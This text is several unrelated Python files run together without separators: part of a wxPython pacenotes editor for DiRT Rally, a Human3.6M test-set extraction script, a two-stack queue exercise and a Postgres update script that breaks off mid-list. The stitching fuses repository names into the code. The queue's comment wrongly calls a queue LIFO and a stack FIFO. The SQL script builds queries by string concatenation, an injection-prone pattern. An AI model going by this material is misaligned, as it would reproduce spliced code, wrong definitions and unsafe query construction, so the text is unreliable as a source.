self.SetName('frame_main') self.title = 'DiRTy Pacenotes' self.icon = wx.Icon(os.path.join(img_path, 'favicon.ico')) self.font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT) self.SetMinSize(wx.Size(480, 360)) self.SetSize(wx.Size(480, 720)) self.SetTitle(self.title) self.SetIcon(self.icon) config = self.get_config() self.ip = config['ip'] self.port = int(config['port']) self.server = (self.ip, self.port) self.co_driver = config['co_driver'] self.delay = int(config['delay']) self.interval = int(config['interval']) self.volume = int(config['volume']) self.countdown = ast.literal_eval(config['countdown']) self.handbrake = config['handbrake'] if not self.co_driver: # First run. self.show_settings() if not self.co_driver: sys.exit() q_cfg.put_nowait((self.server, self.co_driver, self.delay-100, self.volume, self.countdown)) self.co_path = os.path.join(app_path, 'co-drivers', self.co_driver) self.pace_path = os.path.join(self.co_path, 'pacenotes') self.sound_path = os.path.join(self.co_path, 'sounds') self.sound_list = defaultdict(list) self.sounds_csv = os.path.join(self.co_path, 'sounds.csv') self.dic_stages = defaultdict(list) self.read_stages() self.read_audio() self.file_handle = '' self.file_name = '' self.radios = [] self.dist = 0 self.pace = '' self.stage_name = '' self.stage_path = '' # self.stage_length = '' self.delay_mode = '' self.curr_dist = 0 self.curr_line = None self.prev_line = None self.last_dist = -20 self.cbs = set() self.cbs_by_id = set() self.checkboxes = set() self.line_pace = None self.line_pace_by_id = 0 self.from_, self.to_ = (0, 0) self.sel_length = 0 self.line_end = 0 self.dic_lines = {} self.dic_entries = {} self.end = 0 self.count_error = 0 self.count_auto = 0 self.hint = 'pacenotes' self.modified = False self.restart = False self.timer_error = wx.Timer(self) self.timer_auto = wx.Timer(self) self.menu_bar = MenuBar(self) self.menu_bar.Append(self.menu_bar.file_menu, '&File') self.menu_bar.Append(self.menu_bar.edit_menu, '&Edit') self.menu_bar.Append(self.menu_bar.autosave_menu, '&Autosave') self.menu_bar.Append(self.menu_bar.delay_menu, '&Pacenotes') self.menu_bar.Append(self.menu_bar.help_menu, '&Help') self.SetMenuBar(self.menu_bar) self.menu_bar.EnableTop(1, False) self.menu_bar.EnableTop(2, False) self.menu_bar.EnableTop(3, False) self.editor = Editor(self) self.read_sounds() self.reload_sounds() self.persist_manager = per.PersistenceManager.Get() config_file = os.path.join(data_path, self.editor.tabs.GetName()) self.persist_manager.SetPersistenceFile(config_file) # self.persist_manager.RegisterAndRestore(self.editor.tabs) self.statusbar = self.CreateStatusBar() self.statusbar.SetName('status') self.statusbar.SetStatusText('Processing audio files, please wait...') self.taskbar = TaskBar(self) # Create taskbar icon. self.reader = Reader() # Start UDP thread. pub.subscribe(self.get_progress, 'get_progress') pub.subscribe(self.get_stage, 'get_stage') pub.subscribe(self.get_dist, 'get_dist') pub.subscribe(self.get_pause, 'get_pause') pub.subscribe(self.key_error, 'key_error') # pub.subscribe(self.get_stage_length, 'get_stage_length') self.progress = wx.Gauge(self.statusbar, pos=(265, 4), range=self.loaded_max) self.Bind(wx.EVT_TIMER, self.on_timer_error, self.timer_error) self.Bind(wx.EVT_TIMER, self.on_timer_auto, self.timer_auto) self.Bind(wx.EVT_CLOSE, self.on_quit) wx.CallAfter(self.register_controls) # Define methods. # Creator. def add_category(self, event): dlg = wx.TextEntryDialog(self, 'Specify a name for the new category', 'CATEGORY NAME') if dlg.ShowModal() == wx.ID_OK and dlg.GetValue(): tab_right = wx.Panel(self.creator.tabs_right, style=wx.TAB_TRAVERSAL | wx.BORDER_NONE, name=dlg.GetValue(), id=2) tab_right.SetBackgroundColour('white') tab_right.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_right = wx.ListBox(tab_right, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_right, 0, wx.EXPAND) tab_right.SetSizer(h_box_tabs) list_box_right.Bind(wx.EVT_LISTBOX, self.on_listbox_right) self.creator.tabs_right.AddPage(tab_right, dlg.GetValue(), True) dlg.Destroy() def on_listbox_left(self, event): if event.GetExtraLong(): self.creator.selection_left.append(event.GetString()) else: self.creator.selection_left.remove(event.GetString()) if self.creator.selection_left: self.creator.button_in.Enable() else: self.creator.button_in.Disable() def on_listbox_right(self, event): if event.GetExtraLong(): self.creator.selection_right.append(event.GetString()) else: self.creator.selection_right.remove(event.GetString()) if self.creator.selection_right: self.creator.button_out.Enable() else: self.creator.button_out.Disable() def sounds_in(self, event): if self.creator.selection_left: for child_right in self.creator.tabs_right.GetCurrentPage().GetChildren(): child_right.InsertItems(self.creator.selection_left, child_right.GetCount()) for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): sel_list = child_left.GetSelections() sel_list.reverse() for selected in sel_list: child_left.Delete(selected) self.creator.selection_left.clear() self.creator.button_in.Disable() else: pass def sounds_out(self, event): if self.creator.selection_right: for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): child_left.InsertItems(self.creator.selection_right, child_left.GetCount()) for child_right in self.creator.tabs_right.GetCurrentPage().GetChildren(): sel_list = child_right.GetSelections() sel_list.reverse() for selected in sel_list: child_right.Delete(selected) self.creator.selection_right.clear() self.creator.button_out.Disable() else: pass def on_tab_close(self, event): sel_list = [] children = self.creator.tabs_right.GetCurrentPage().GetChildren() for child in children: for row in range(child.GetCount()): sound = child.GetString(row) sel_list.append(sound) for child_left in self.creator.tabs_left.GetCurrentPage().GetChildren(): child_left.InsertItems(sel_list, child_left.GetCount()) def reset_sounds(self, event): self.creator.create_audio() self.creator.create_sounds() def diff(self, l_one, l_two): return list(set(l_one) - set(l_two)) # DiRTy Pacenotes def register_controls(self): self.Freeze() self.register() self.Thaw() def register(self, children=None): if children is None: self.persist_manager.RegisterAndRestore(self) children = self.GetChildren() for child in children: name1 = child.GetName() grandchildren = child.GetChildren() for grandchild in grandchildren: name2 = grandchild.GetName() def on_play(self, event=None): snd = self.editor.input_pace.GetValue().split() for sound_name in snd: try: sound_pace = sound_bank[sound_name] + self.volume play(sound_pace) except KeyError: self.key_error(sound_name) pass def on_cancel(self, event): self.clear_input_pace() def read_audio(self): snd_file_list = glob.glob(self.sound_path + '/*') q_snd.put_nowait(snd_file_list) self.loaded_max = len(snd_file_list) def get_progress(self, arg): self.progress.SetValue(arg) if arg == self.loaded_max: self.progress.Destroy() self.SetStatusText('Open pacenotes file or start recce') def get_pause(self, arg): self.pause = arg def read_sounds(self): try: self.sound_list.clear() with open(self.sounds_csv, 'r') as csv_file: csv_data = csv.DictReader(csv_file) for row in csv_data: pair = list(row.items()) # list of tuples of (key, value) pairs for key, value in pair: if value: self.sound_list[key].append(value) # dict with multiple values for same keys except IOError: wx.MessageBox('Create your co-driver', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) self.show_creator() self.read_sounds() def on_creator(self, event): self.show_creator() def show_creator(self): self.creator = Creator(self) self.creator.ShowModal() def on_settings(self, event): self.show_settings() def show_settings(self): self.settings = Settings(self) self.settings.ShowModal() def read_stages(self): try: with open(os.path.join(app_path, 'data\\stages.csv'), 'r') as f: _ = next(f) for line in f: row = line.strip() lis = row.partition(',') # tuple key = float(lis[0]) # key as float val = lis[2] # value as string self.dic_stages[key].append(val) # dictionary except IOError: self.SetStatusText('stages.csv file not found') self.on_error() q_stg.put_nowait(self.dic_stages) def get_config(self): if not os.path.exists(config_ini): self.create_config(self) return ConfigObj(config_ini) @staticmethod def create_config(self): # Set default values for config.ini. config = ConfigObj(config_ini) config['ip'] = '127.0.0.1' config['port'] = '20777' config['co_driver'] = '' config['delay'] = '200' config['interval'] = '1000' config['volume'] = '5' config['countdown'] = 'True' config['handbrake'] = 'N/A' config.write() @staticmethod def update_config(self): config = ConfigObj(config_ini) config['ip'] = self.ip config['port'] = self.port config['co_driver'] = self.co_driver config['delay'] = self.delay config['interval'] = self.interval config['volume'] = self.volume config['countdown'] = self.countdown config['handbrake'] = self.handbrake config.write() def on_change_handbrake(self, event): self.change_handbrake(self) @staticmethod def change_handbrake(self): # hand_input = HandInput() pass def get_stage(self, arg1, arg2): if self.stage_name: if arg1 != self.stage_name and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_QUESTION) if dlg.ShowModal() == wx.ID_YES: self.write_file() wx.MessageBox(self.file_name + ' has been saved', 'Confirmation', wx.OK | wx.ICON_INFORMATION) self.stage_name = arg1 self.stage_path = arg2 self.update_stage() def update_stage(self): # From UDP stream. self.file_name = self.stage_name + '.txt' self.open_file() self.menu_bar.EnableTop(3, True) self.menu_bar.menu_open.Enable(False) self.editor.slider_volume.Enable() self.editor.button_play.Enable() self.editor.label_delay.SetForegroundColour('dark grey') q_vol.put_nowait(self.volume) self.update_delay() def get_dist(self, arg1, arg2): self.curr_dist = arg1 self.last_dist = arg2 self.update_dist() def update_dist(self): if self.curr_dist >= 0 and not self.editor.input_dist.HasFocus(): self.editor.input_dist.SetValue(self.curr_dist) # Manage scrolling. sort_keys = sorted(list(self.dic_lines.keys()), key=int) lines = [] for index, d in enumerate(sort_keys): lines.append(index) if index < (len(sort_keys)): self.curr_line = self.dic_lines[sort_keys[index]] self.prev_line = self.dic_lines[sort_keys[index - 1]] if self.curr_dist > self.last_dist: if self.curr_dist == int(d) - (self.delay - 100): # print self.editor.scrolled_panel.GetScrollPos(wx.VERTICAL), 'pos' # print self.editor.scrolled_panel.GetScrollLines(wx.VERTICAL), 'lines' self.curr_line.SetFont(self.font.Bold()) self.prev_line.SetFont(self.font) # print index, d, 'index' # TODO if index > 1: self.editor.scrolled_panel.ScrollLines(3) self.Refresh() # elif self.curr_dist < self.last_dist: # If going wrong way. # self.curr_line.SetFont(self.font) # self.prev_line.SetFont(self.font) # self.Refresh() elif self.curr_dist == 0: # If at the start line. self.editor.scrolled_panel.Scroll(0, 0) for l in lines: self.curr_line = self.dic_lines[sort_keys[l]] self.curr_line.SetFont(self.font) self.Refresh() ''' def get_stage_length(self, arg): self.stage_length = arg self.update_length() def update_length(self): self.editor.label_length.SetLabel(str(self.stage_length)) ''' def on_delay(self, event): self.delay = event.GetId() q_del.put_nowait(self.delay - 100) self.update_delay() delay = self.menu_bar.delay_menu.FindItemById(self.delay).GetItemLabelText() self.SetStatusText('Pacenote calls set to ' + delay) def update_delay(self): if self.delay == 100: self.delay_mode = 'RECCE' else: self.delay_mode = 'STAGE' self.editor.label_delay.SetLabel(self.delay_mode) def key_error(self, arg): self.statusbar.SetStatusText('\'' + arg + '\'' + ' not found in ' + self.co_driver + '\'s Sounds folder') self.on_error() def on_error(self): self.statusbar.SetBackgroundColour('RED') self.statusbar.Refresh() self.timer_error.Start(50) def on_timer_error(self, event): self.count_error = self.count_error + 1 if self.count_error == 25: self.statusbar.SetBackgroundColour('white') self.statusbar.Refresh() self.timer_error.Stop() self.count_error = 0 def on_autosave(self): self.count_auto = 0 if self.interval == 1000: self.SetStatusText('Autosave OFF') else: self.timer_auto.Start(60000) self.SetStatusText('Autosave set to ' + str(self.interval) + ' minutes') def on_timer_auto(self, event): self.count_auto = self.count_auto + 1 if self.count_auto == self.interval: self.write_file() self.SetStatusText('File ' + self.file_name + ' has been auto-saved.') self.on_autosave() def on_interval(self, event): self.timer_auto.Stop() evt = event.GetEventObject() self.interval = event.GetId() self.on_autosave() def on_quit(self, event): if self.stage_name and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_WARNING) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.write_file() dlg = wx.MessageDialog(self, self.file_name + ' has been saved', 'Confirmation', wx.OK | wx.ICON_INFORMATION) dlg.ShowModal() elif not self.stage_name: # from 'Create your co-driver' pass self.persist_manager.SaveAndUnregister(self.editor.tabs) pub.unsubAll() udp_running = False q_run.put_nowait(udp_running) self.reader.join(0.5) self.update_config(self) self.taskbar.Destroy() self.Destroy() def on_save(self, event): if event.GetId() == wx.ID_SAVE: # From menu. if self.checkboxes: if self.modified: self.write_file() self.SetStatusText(self.file_name + ' has been saved') else: self.SetStatusText(self.file_name + ' has not been modified yet') self.on_error() else: self.SetStatusText('There are no pacenotes to save') self.on_error() def on_reload(self, event): if event.GetId() == 1: # From Creator. for child in self.creator.tabs_right.GetChildren(): category = child.GetName() if category != 'panel': for grandchild in child.GetChildren(): sound_list = [] sound_dict = {} for row in range(grandchild.GetCount()): sound = grandchild.GetString(row) if sound: sound_list.append(sound) sound_list.sort() sound_dict[category] = sound_list self.creator.dict_list_c.update(sound_dict) if not self.creator.dict_list_c: wx.MessageBox('Create at least one category', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) elif self.creator.dict_list_c: check = False for k, v in self.creator.dict_list_c.items(): if not v: check = True if check: wx.MessageBox('At least one category is empty', 'CO-DRIVER ERROR', wx.OK | wx.ICON_ERROR) else: keys = self.creator.dict_list_c.keys() with open(self.sounds_csv, 'w', newline='') as f: writer = csv.writer(f, delimiter=",") writer.writerow(keys) writer.writerows(itertools.zip_longest(*[self.creator.dict_list_c[key] for key in keys])) self.creator.Destroy() self.reload_sounds() elif event.GetId() == 2: # From settings. if self.co_driver: self.ip = self.settings.ip_value.GetValue() self.port = self.settings.port_value.GetValue() self.co_driver = self.settings.combo_co_driver.GetValue() self.countdown = self.settings.count_check.GetValue() self.update_config(self) self.on_quit(event) self.restart_app(self) else: # First run. self.ip = self.settings.ip_value.GetValue() self.port = self.settings.port_value.GetValue() self.co_driver = self.settings.combo_co_driver.GetValue() self.countdown = self.settings.count_check.GetValue() if not self.co_driver: wx.MessageBox('Choose your co-driver', 'CO-DRIVER OPTION', wx.OK | wx.ICON_WARNING) return self.update_config(self) self.settings.Destroy() def write_file(self): self.file_handle = os.path.join(self.stage_path, self.file_name) with open(self.file_handle, 'w') as f: for dist in sorted(self.dic_entries, key=int): pace = self.dic_entries[dist] line = '{},{}'.format(dist, pace) f.write(line + '\n') self.modified = False def on_open(self, event): if self.stage_name and self.checkboxes and self.modified: dlg = wx.MessageDialog(self, 'Do you want to save ' + self.file_name + '?', 'Confirm', wx.YES_NO | wx.YES_DEFAULT | wx.ICON_WARNING) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.on_save(event) dlg = wx.FileDialog(self, 'Open pacenotes file', self.pace_path, '', 'Text files (*.txt)|*.txt', wx.FD_OPEN | wx.FD_FILE_MUST_EXIST) if dlg.ShowModal() == wx.ID_OK: self.file_name = dlg.GetFilename() self.stage_path = dlg.GetDirectory() self.stage_name, ext = os.path.splitext(self.file_name) self.open_file() dlg.Destroy() self.editor.label_delay.SetLabel('NOTES') def open_file(self): self.editor.scrolled_panel.DestroyChildren() self.dic_entries.clear() self.dic_lines.clear() self.SetTitle(self.title) file_handle = os.path.join(self.stage_path, self.file_name) try: with open(file_handle, 'r') as f: for line in f: if line and line.split(): lis = line.partition(',') # tuple self.dist = int(lis[0]) self.pace = lis[2] self.create_pacenotes() else: continue except IOError: self.SetStatusText(self.file_name + ' not found in ' + self.co_driver + '\'s Pacenotes folder') self.on_error() return self.menu_bar.menu_save.Enable(True) self.menu_bar.EnableTop(1, True) self.menu_bar.EnableTop(2, True) self.editor.input_pace.Clear() self.editor.input_pace.SetHint(self.hint) self.editor.tabs.Enable() self.editor.input_dist.Enable() self.editor.button_play.Disable() for button in self.editor.buttons: button.Disable() self.SetTitle(self.title + ' - ' + self.stage_name) self.modified = False self.on_autosave() def create_pacenotes(self): text_dist = ict.IntCtrl(self.editor.scrolled_panel, id=self.dist, name='dist', value=self.dist, min=1, max=19999, size=wx.Size(45, 23), style=wx.TE_PROCESS_ENTER, limited=True, allow_none=False) text_pace = wx.TextCtrl(self.editor.scrolled_panel, id=self.dist, name='pace', value=self.pace) tick = wx.CheckBox(self.editor.scrolled_panel, id=int(self.dist), name='tick') text_pace.SetEditable(False) text_pace.SetCursor(wx.Cursor(wx.CURSOR_ARROW)) h_box_scr = wx.BoxSizer(wx.HORIZONTAL) h_box_scr.Add(tick, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 3) h_box_scr.Add(text_dist, 0, wx.LEFT, 2) h_box_scr.Add(text_pace, 1, wx.EXPAND | wx.LEFT, 1) self.editor.v_box.Add(h_box_scr, 0, wx.EXPAND | wx.BOTTOM, 1) self.editor.scrolled_panel.Layout() self.editor.scrolled_panel.FitInside() self.end = self.editor.scrolled_panel.GetScrollLines(wx.VERTICAL) text_dist.Bind(wx.EVT_TEXT_ENTER, self.on_distance) text_pace.Bind(wx.EVT_MOUSE_CAPTURE_CHANGED, self.on_selection) self.Bind(wx.EVT_CHECKBOX, self.on_tick) self.dic_lines[self.dist] = text_pace self.dic_entries[self.dist] = self.pace.strip('\n') self.checkboxes.add(tick) def reload_pacenotes(self): self.editor.scrolled_panel.DestroyChildren() self.checkboxes.clear() for dist in sorted(self.dic_entries, key=int): self.dist = int(dist) self.pace = self.dic_entries[dist].strip('\n') self.create_pacenotes() q_dic.put_nowait(self.dic_entries) self.modified = True def reload_sounds(self): self.read_sounds() self.editor.tabs.DeleteAllPages() for category, sounds_list in list(self.sound_list.items()): tab = wx.Panel(self.editor.tabs, name=category) tab.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_ctrl = ulc.UltimateListCtrl(tab, agwStyle=ulc.ULC_BORDER_SELECT | ulc.ULC_SORT_ASCENDING | ulc.ULC_SINGLE_SEL | ulc.ULC_HOT_TRACKING | wx.LC_LIST) for index, sound in enumerate(sounds_list): list_ctrl.InsertStringItem(index, sound) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_ctrl, 1, wx.EXPAND) tab.SetSizer(h_box_tabs) self.editor.tabs.AddPage(tab, category) self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.on_pacenote) if not self.stage_name: self.editor.tabs.Disable() # self.editor.Refresh() def clear_input_pace(self): self.editor.input_pace.Clear() self.editor.input_pace.SetHint(self.hint) self.editor.input_dist.SetFocus() for button in self.editor.buttons: button.Disable() self.editor.button_play.Disable() def on_add(self, event): self.dist = self.editor.input_dist.GetValue() if self.stage_name: if self.dist != 0: for dist in self.dic_entries: if self.dist == dist: dlg = wx.MessageDialog(self, 'Replace pacenotes for current distance?', 'Confirm', wx.YES_NO | wx.NO_DEFAULT | wx.ICON_QUESTION) dlg_choice = dlg.ShowModal() if dlg_choice == wx.ID_YES: self.add_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.dist == d: self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenotes replaced') return elif dlg_choice == wx.ID_NO: dlg.Destroy() self.SetStatusText('Operation cancelled') return self.add_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.dist == d: self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenotes added') else: self.SetStatusText('Distance cannot be 0') self.on_error() else: self.SetStatusText('Open pacenotes text file or run a stage first') self.on_error() def add_pacenotes(self): self.pace = self.editor.input_pace.GetValue() self.dic_entries[self.dist] = self.pace.strip('\n') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.clear_input_pace() def on_insert(self, event): if self.sel_length == 0 == self.from_: # Insert pacenote at the beginning of line. self.line_pace.SetInsertionPoint(self.from_) else: # Insert pacenote after selection. self.line_pace.SetInsertionPoint(self.to_) self.line_pace.WriteText(self.editor.input_pace.GetValue()) self.dic_entries[self.line_pace_by_id] = self.line_pace.GetValue().replace('\n', '') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote inserted') def on_replace(self, event): self.line_pace.Replace(self.from_, self.to_, self.editor.input_pace.GetValue()) self.dic_entries[self.line_pace_by_id] = self.line_pace.GetValue().strip('\n') self.reload_pacenotes() self.editor.button_add.Disable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote replaced') def on_delete(self, event): if self.cbs_by_id: # Remove checked lines. for dist in self.cbs_by_id: del self.dic_entries[dist] del self.dic_lines[dist] self.cbs.clear() self.cbs_by_id.clear() self.checkboxes.clear() self.editor.button_delete.Disable() self.menu_bar.menu_select_all.Check(False) else: # Remove selected text. self.line_pace.Remove(self.from_, self.to_) dic_2 = {} dic_2[self.line_pace_by_id] = self.line_pace.GetValue().strip('\n') self.dic_entries.update(dic_2) self.reload_pacenotes() self.clear_input_pace() self.editor.button_play.Disable() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Pacenote deleted') def on_selection(self, event): self.line_pace = event.GetEventObject() line_pace_by_name = self.line_pace.GetName() self.line_pace_by_id = self.line_pace.GetId() self.from_, self.to_ = self.line_pace.GetSelection() self.line_end = self.line_pace.GetLastPosition() self.sel_length = self.to_ - self.from_ if self.cbs: # Clear any ticks. for cb in self.cbs: cb.SetValue(False) self.cbs.clear() self.cbs_by_id.clear() else: if line_pace_by_name == 'pace': if self.sel_length > 0: if self.editor.input_pace.GetValue(): self.editor.button_insert.Enable() self.editor.button_replace.Enable() self.editor.button_delete.Enable() else: self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Enable() elif self.sel_length == 0 == self.from_: self.editor.button_insert.Enable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() else: # Prevent splitting words. self.editor.button_insert.Disable() self.editor.button_replace.Disable() self.editor.button_delete.Disable() def on_distance(self, event): line_dist = event.GetEventObject() line_dist_by_name = line_dist.GetName() line_dist_by_id = line_dist.GetId() self.dist = line_dist.GetValue() if self.dist: if line_dist_by_name == 'dist': # Processed by Enter. if self.dist != line_dist_by_id: self.dic_entries[self.dist] = self.dic_entries.pop(line_dist_by_id, '') self.dic_lines[self.dist] = self.dic_lines.pop(line_dist_by_id, '') self.reload_pacenotes() sort_keys = sorted(list(self.dic_lines.keys()), key=int) for index, d in enumerate(sort_keys): if self.line_pace_by_id == int(d): self.editor.scrolled_panel.Scroll(0, index) self.SetStatusText('Distance updated') else: self.statusbar.Refresh() elif line_dist_by_name == 'input': if self.editor.input_pace.GetValue(): self.editor.button_add.Enable() self.editor.button_play.Enable() else: self.editor.button_add.Disable() self.editor.button_play.Enable() def on_pacenote(self, event): if not self.editor.input_pace.GetValue(): # Get rid of pacenote hint. self.editor.input_pace.Clear() self.editor.button_play.Enable() self.editor.input_pace.AppendText(event.GetText() + ' ') if self.line_pace: # If text selected. if self.editor.input_dist.GetValue(): self.editor.button_add.Enable() self.editor.button_insert.Enable() self.editor.button_replace.Enable() elif not self.line_pace: if self.editor.input_dist.GetValue(): self.editor.button_add.Enable() self.editor.button_insert.Disable() self.editor.button_replace.Disable() else: for button in self.editor.buttons: button.Disable() def on_tick(self, event): self.editor.button_insert.Disable() self.editor.button_replace.Disable() cb = event.GetEventObject() cb_by_id = event.GetId() if cb_by_id != 20000: if cb.IsChecked(): self.cbs.add(cb) self.cbs_by_id.add(cb_by_id) self.editor.button_delete.Enable() self.menu_bar.menu_select_all.IsChecked() else: self.cbs.remove(cb) self.cbs_by_id.remove(cb_by_id) if not self.cbs: self.editor.button_delete.Disable() self.menu_bar.menu_select_all.Check(False) else: # Select All. for tick in self.checkboxes: tick_by_id = tick.GetId() if self.menu_bar.menu_select_all.IsChecked(): self.cbs.add(tick) self.cbs_by_id.add(tick_by_id) tick.SetValue(True) self.editor.button_delete.Enable() else: self.cbs.clear() self.cbs_by_id.clear() tick.SetValue(False) self.editor.button_delete.Disable() def on_undo_select(self, event): # stock_undo = [] # undo = self.text_pace.Undo() # stock_undo.append(undo) pass def on_slider(self, event): evt = event.GetEventObject() self.volume = evt.GetValue() q_vol.put_nowait(self.volume) def on_about(self, event): description = wordwrap('DiRTy Pacenotes lets you create your own pacenotes\n' 'for DiRT Rally and DiRT Rally 2.0 stages.\n' 'These custom pacenotes will be read by the co-driver of your choice.\n', 420, wx.ClientDC(self)) licence = wordwrap('Licensed under the Apache License, Version 2.0 (the "License");\n' 'you may not use this software except in compliance with the License.\n' 'You may obtain a copy of the License at\n' 'http://www.apache.org/licenses/LICENSE-2.0\n' 'Unless required by applicable law or agreed to in writing,\n' 'software distributed under the License is distributed on an "AS IS" BASIS,\n' 'WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,\n' 'either express or implied. See the License for the specific language\n' 'governing permissions and limitations under the License.', 420, wx.ClientDC(self)) icon = wx.Icon(os.path.join(img_path, 'icon.png')) info = wx.adv.AboutDialogInfo() info.SetName('DiRTy Pacenotes') info.SetVersion('2.5.1') info.SetIcon(icon) info.SetDescription(description) info.SetCopyright('(C) 2017 - 2019 ') info.SetLicence(licence) wx.adv.AboutBox(info) @staticmethod def restart_app(self): sys.stdout.flush() os.execl(sys.executable, sys.executable, *sys.argv) if __name__ == '__main__': app = wx.App() frame = DiRTyPacenotes(None) frame.Centre() frame.Show() app.MainLoop() # Copyright 2020 , , , , # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import os import numpy as np from tqdm import tqdm, trange if __name__ == "__main__": parser = argparse.ArgumentParser(''' Generates the Human3.6M testing set from the testing videos by extracting fixed-length sequences. Videos are saved in the npz format, like the training videos. ''') parser.add_argument('--data_dir', type=str, metavar='DIR', required=True, help='Folder where the dataset is stored and the testing set will be saved.') parser.add_argument('--size', type=int, metavar='SIZE', default=1000, help='Number of sequences to extract (size of the testing set).') parser.add_argument('--seq_len', type=int, metavar='LEN', default=53, help='Number of frames per sequence to extract.') parser.add_argument('--subsampling', type=int, metavar='SUB', default=8, help='Selects one in $SUB frames.') parser.add_argument('--seed', type=int, metavar='SEED', default=42, help='Fixed NumPy seed to produce the same dataset at each run.') args = parser.parse_args() # Fix random seed np.random.seed(args.seed) # Directory where the videos will be saved save_dir = os.path.join(args.data_dir, f'test_set_{args.seq_len}_{args.subsampling}') # Create the directory if needed if not os.path.exists(save_dir): os.makedirs(save_dir) print(f'Generating test set at {save_dir}...') video_files = sorted(os.listdir(os.path.join(args.data_dir, 'test'))) nb_videos = len(video_files) actual_seq_len = (args.seq_len - 1) * args.subsampling + 1 progress_bar = tqdm(total=args.size, ncols=0) # Randomly extract a determined number of videos for i in trange(args.size): # Randomly choose the video video_id = np.random.randint(nb_videos) video_path = os.path.join(args.data_dir, 'test', video_files[video_id]) video_data = {k: v for k, v in np.load(video_path).items()} video_length = video_data['image'].shape[0] # Randomly choose the beginning of the video extract to be included in the testing set t_0 = np.random.randint(video_length - actual_seq_len + 1) # Intermediary frames are kept for compatibility purposes when the dataset in loaded in the code of the model video_data['image'] = video_data['image'][t_0: t_0 + actual_seq_len:] video_data['frame'] = t_0 # Save the video np.savez(os.path.join(save_dir, f'test_{i}'), **video_data) uday256071/DataStructures-and-Algorithms0 # implement a queue (LIFO) using two stack(FIFO) class queue(): def __init__(self): self.instack=[] self.outstack=[] def enque(self,ele): self.instack.append(ele) def deque(self): if self.outstack==[]: while self.instack: self.outstack.append(self.instack.pop()) return self.outstack.pop() items=queue() for i in range(5): items.enque(i) items.enque(15) print(items.instack) print(items.deque()) print(items.outstack) update_project_eng.py from UnoCPI import sqlfiles,settings import psycopg2 import os sql = sqlfiles global connection global cursor try: connection = psycopg2.connect(user=settings.DATABASES['default']['USER'], password=settings.DATABASES['default']['PASSWORD'], host=settings.DATABASES['default']['HOST'], port=settings.DATABASES['default']['PORT'], database=settings.DATABASES['default']['NAME'], sslmode="require") if connection: print("Postgres SQL Database successful connection") cursor = connection.cursor() print("Executing Community Partner status inactive") #UPDATE Community partner to show status 'Inactive' from newly added Partner Status Table activityTypeDict_SL = [] activityTypeDict_SL.append({'oldValue':'Meeting / Gathering','newValue':'Other'}) activityTypeDict_SL.append({'oldValue':'Course','newValue':'Course'}) activityTypeDict_SL.append({'oldValue':'Unpaid Services','newValue':'Other'}) activityTypeDict_SL.append({'oldValue':'General Activity','newValue':'Course'}) activityTypeDict_SL.append({'oldValue':'Event / Exhibit / Performance','newValue':'Course'}) for x in activityTypeDict_SL: print(x['oldValue'],x['newValue']) query = "update projects_project set activity_type_id = \ (select a.id from projects_activitytype as a where a.name = '"+x['newValue']+"') \ where engagement_type_id = \ (select e.id from projects_engagementtype as e where e.name = 'Service Learning') \ and activity_type_id = \ (select c.id from projects_activitytype as c where c.name = '"+x['oldValue']+"')" print('query--',query) cursor.execute(query) connection.commit() activityTypeDict_AH = [] activityTypeDict_AH.append({"oldValue":'Unpaid Services',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Course',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Event / Exhibit / Performance',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Capstone',"newValue":'Other'}) activityTypeDict_AH.append({"oldValue":'Workshop',"newValue":'Other'}) 